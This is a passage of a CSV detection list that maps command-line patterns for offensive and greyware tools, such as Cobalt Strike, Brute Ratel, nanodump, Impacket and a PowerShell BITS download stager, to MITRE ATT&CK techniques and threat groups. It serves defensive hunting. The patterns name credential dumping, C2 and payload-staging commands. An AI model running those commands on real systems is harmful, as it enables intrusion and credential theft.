!,N/A,N/A,N/A,N/A,N/A,N/A -Get-GPO -All,greyware_tool_keyword,powershell,AD Module GroupPolicy - List of GPO in the domain,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -Get-NetGroup -FullData*,greyware_tool_keyword,powershell,Find groups in the current domain (PowerView),T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -getprivs,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -get-spns *,offensive_tool_keyword,cobaltstrike,This tool uses LDAP to check a domain for known abusable Kerberos 
delegation settings,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,10,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -grab_token *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -hydra -*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -Impacket *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -impersonate *\*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -import boko*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,0,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -inceptor*dotnet*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -kerberoast *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - 
T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -koh exit*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -koh list*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -Ladon *-* *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -Ladon *.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -Ladon */* *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -Ladon Mac * ,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -Lapsdump *,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,0,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -ldapsearch -h * -x*,greyware_tool_keyword,ldapsearch,ldapsearch to enumerate ldap,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://man7.org/linux/man-pages/man1/ldapsearch.1.html,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -LdapSignCheck *,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,0,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -ldeep *,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,0,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -list_exports *.dll*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -load *.cna,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -make_token *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -make_token *,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/m57/cobaltstrike_bofs,1,0,N/A,10,10,153,25,2022-07-23T20:37:52Z,2020-07-30T22:36:51Z -masscan *,offensive_tool_keyword,masscan,TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.,T1046,TA0007,N/A,N/A,Reconnaissance,https://github.com/robertdavidgraham/masscan,1,0,N/A,N/A,10,21683,2981,2023-08-09T13:28:54Z,2013-07-28T05:35:33Z -memdump *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -memex /*.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -memhunt *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary 
Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -na.exe *,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -nanodump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -nc -vz *,greyware_tool_keyword,netcat,Netcat is a featured networking utility which reads and writes data across network connections. using the TCP/IP protocol It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time. it is a feature-rich network debugging and exploration tool. 
since it can create almost any kind of connection you would need and has several interesting built-in capabilities,T1043 - T1052 - T1071 - T1095 - T1132 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,http://netcat.sourceforge.net/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -needle_sift *,offensive_tool_keyword,cobaltstrike,Strstr with user-supplied needle and filename as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Needle_Sift_BOF,1,0,N/A,10,10,30,7,2021-09-27T22:57:33Z,2021-09-27T20:13:10Z -net.recon *,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -nikto -*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - 
T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -nimplant,offensive_tool_keyword,nimplant,user agent default field - A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -nimplant *,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -nmap *,greyware_tool_keyword,nmap,A very common tool. Network host vuln and port detector.,T1046 - T1065 - T1202 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Information Gathering,https://github.com/nmap/nmap,1,0,greyware tool - risks of False positive !,N/A,10,8299,2206,2023-09-29T08:27:35Z,2012-03-09T14:47:43Z -noclient-3.*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -onex install *,offensive_tool_keyword,onex,Onex is a package manager for hacker's. 
Onex manage more than 400+ hacking tools that can be installed on single click,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/onex,1,0,N/A,N/A,,N/A,,, -polenum *:*,offensive_tool_keyword,polenum,Uses Impacket Library to get the password policy from a windows machine,T1012 - T1596,TA0009 - TA0007,N/A,N/A,Discovery,https://salsa.debian.org/pkg-security-team/polenum,1,0,N/A,8,10,N/A,N/A,N/A,N/A -posh -u *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -powerpick *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -"powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*",offensive_tool_keyword,powershell,deployment of a payload through a PowerShell stager using bits to download,T1197,TA0009,N/A,N/A,Collection,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -ps_ex *,offensive_tool_keyword,bruteratel,A Customized Command 
